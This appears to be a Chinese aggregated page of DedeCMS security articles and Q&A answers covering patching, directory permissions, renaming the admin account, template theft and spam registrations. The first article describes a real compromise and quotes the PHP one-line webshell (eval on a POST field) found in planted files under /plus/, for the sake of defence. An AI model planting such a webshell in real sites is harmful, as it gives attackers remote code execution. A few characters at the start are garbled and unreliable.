本文目录一览:
- 1、dedecms的漏洞:Dedecms的隐患如何预防风险
- 2、织梦dedecms注册失败,请检查资料是否有误或与管理员联系
- 3、如何防止织梦模板(DedeCms)被盗及安全设置
- 4、dedecms怎么防垃圾注册?
- 5、Dedecms织梦安全设置之如何防止挂木马与sql注入
- 6、dedecms被注册了很多个人会员,怎么才能不注册?
dedecms的漏洞:Dedecms的隐患如何预防风险
�谌莺苌伲�赡苄慈氲氖焙虿皇呛芊奖悖�还�庑┐�氲淖饔萌肥挡恍〉摹�edecms一直是很火的建站cms,主要得益于两大站长网的鼎力支持;不过,人火是非多,cms太火了同样会被别有用心的人盯上。我的网站一直在使用dedecms,前段时间又一次受到攻击,攻击的目的很简单,那么便是黑链,知道后稍微修改下代码就恢复了,不是很严重;这段时间网站又被莫名上传文件,类似前一次,虽然对方还没来得及修改网站模板,不过这说明网站安全防患还未到位,对方任何时候都可能再次取得管理员权限,所以要特别注意网站的安全防患措施。因为我比较喜欢寻根究底,所以就去网上找了一下相关的资料,发现这确实是dedecms的漏洞,黑客可以利用多维的变量绕过正则检测,漏洞主要发生在/plus/mytag_js.php中,原理便是准备一个MySQL数据库来攻击已知网站的数据库,通过向数据库中写入一句话的代码,只要成功写入,那么以后便可以利用这些代码来获得后台管理员权限。结合我的网站被攻击已经别人类似的经历来看,黑客写入的文件主要存在于/plus/文件夹下,目前已知的几个文件包括ga.php、log.php、b.php、b1.php等,文件的特征便是短小,内容很少,可能写入的时候不是很方便,不过这些代码的作用确实不小的。下面这是ga.php文件中的部分代码:titlelogin/titleno?phpeval($_POST[1])?titlelogin/titleno?phpeval($_POST[1])?titlelogin/titleno?phpeval($_POST[1])?实际的代码比上面截取的要长,不过都是这段代码的重复,至于log.php的代码,同这个类似,只有一句话,简单明了,如果你对网络安全稍有了解,那么会知道?php eval($_POST[1]);?是php一句话木马,使用部分指定的工具可以执行这段代码,预计是破解密码的功能。既然已经知道对方是利用什么样的漏洞,同时知道对方利用什么样的原理来利用漏洞,那么要怎么预防这些危险的事发生呢?经过查询大量的资料,我初步整理出下面这些预防漏洞被利用的步骤,希望对同样适用dedecms的站长朋友们有所帮助。一、升级版本打好补丁设置目录权限这是官方对此的解决办法,不管你使用的是什么版本的dedecms,都要及时在后台升级版本自动更新补丁,这是避免漏洞被利用的最重要的一步;同时官方还提供设置目录的方法,主要是设置data、templets、uploads、a为可读写不可执行权限;include、member、plus、后台管理目录等设置为可执行可读不可写入权限;删除install及special目录,具体如何设置见官方说明。二、修改admin账号及密码黑客可能是利用默认admin账号,随后推测密码来破解的,所以修改默认的admin账号非常重要,至于如何修改,方法很多,比较有效的是用phpadmin登陆网站数据库,找到dede_admin数据库表(dede是数据库表前缀),修改其中userid及pwd两项,其中密码一定要修改成f297a57a5a743894a0e4,这是默认的密码admin;修改后去后台登陆,登陆dede后台后修改密码。三、别的值得注意的地方至于更多的细节,同样要注意,尽量别选择太廉价的空间,太廉价的空间很容易出现服务器本身的安全问题,只要服务器出现问题,整个服务器下面的网站都没救了。还有便是,如果没必要,尽量别开通会员注册什么的,使用起来很麻烦;至于网站后台目录,不要写到robots.txt里面,同时每个月至少换一次,管理员密码什么的同样要更换,避免和别的账号密码相同被推测出来。
织梦dedecms注册失败,请检查资料是否有误或与管理员联系
您好,朋友。跟版网团队很高兴为您解答:
这个问题通常是member表发生错误或者表结构损坏造成的,建议做以下操作:
登录dedecms后台 打开“系统-》数据库备份/还原”找到xxx_memebr 点击后面的修复,或者使用phpmyadmin中提供的表修复功能。织梦后台的修复如下:
希望我的回答能够帮到您,祝您早日成功。如果有问题可再回复!
如何防止织梦模板(DedeCms)被盗及安全设置
注:本篇模板防盗安全设置,针对的是dedecms程序本身,不涉及其他安全设置。
下面跟大家说下常见的方式,这些方法对技术有限的人来说,可以起到模板防盗作用,对真正的高手来说,大多数网站都是仿不了的,这个大家都需要知道。
方法一:修改系统默认模板文件夹名字,最简单,也很实用
步骤:后台-系统-系统基本参数-站点设置-模板默认风格-default
把default改成你自己取的名字,然后进FTP,打开templets文件夹,把default名字改成一致,这样别人就不知道你网站模板文件夹名字了。方法二:把系统默认的.htm模板文件名改一改。
大家都知道默认的模板文件的名字,如index.htm(),list_article.htm(文章列表页),article_article.htm(文章内容页)等等,直接就给扒下来。
所以,我们把这些默认的名字改一改,然后去栏目管理处,重新指定一下模板文件就可以增加一下模板的安全了。
1、认识一下默认模板文件的名字及作用
首页模板:/templets/default/index.html
文章频道首页:/templets/default/index_article.htm
文章列表页:/templets/default/list_article.htm
文章内容页:/templets/default/article_article.htm
图集频道首页:/templets/default/index_image.htm
具体模板名介绍:
2、不同栏目各自指定不同的模板
步骤:核心-常用操作-网站栏目管理-点击右侧对应栏目的“更改”链接-高级选项-手动指定模板
详细操作方法:
3、完成以上2步,生成更新一下栏目就行了。方法三:这个方法是上2个的结合,说起来也简单,
1、后台不修改默认模板风格default的名字,在templets文件夹里面新建一个文件夹,自己取名。
2、把用到的模板文件上传到这个文件夹里面;
这里需要有一个注意,因为后台没有修改默认的模板风格位置,所有,首页、列表、内容等模板文件引用的通用页头(head.html)、页尾(footer.htm),就需要修改一下,不然就不显示了页头页尾,方法如下:
{dede:include
filename="123456/head.htm"/}
如果你自己建立的模板文件夹名字是123456,调用代码里就写123456。
搜索页面、tag页面,都放在默认的default里面,如果放在自己建的文件夹里面,系统不认。
3、按照方法二的步骤,手动指定各个栏目的模板。
方法四:修改CSS、图片、JS等调用路径。
这个很重要,最好把CSS、图片、JS等放到网站根目录再调用。
不然的话,即使你修改了默认的风格目录,在查看网页源代码的时候,还是照样可以看到模板目录的!
好多新手在用dedecms建站的时候,没有重视这个,等模板被盗了,才发现,很让人生气,所以,我们要提前做好这些防盗的准备,提高模板的安全性。
写的比较啰嗦,主要是为了让大家能够容易理解。
dedecms怎么防垃圾注册?
我觉得开审核功能,对于dede我觉得可以关闭注册功能,除非你跟论坛绑定。
Dedecms织梦安全设置之如何防止挂木马与sql注入
首先做好程序的防护,更新所有的安全补丁
然后在服务器上做好安全防护,安装防护软件,安全狗之类的
可以防护大部分的攻击
时常关注织梦最新的漏洞消息,及时更新程序。
dedecms被注册了很多个人会员,怎么才能不注册?
用mysql管理工具,即:phpmyadmin
修改一个表的名称或者删除这个表,:dede_member
彻底解决这个问题。
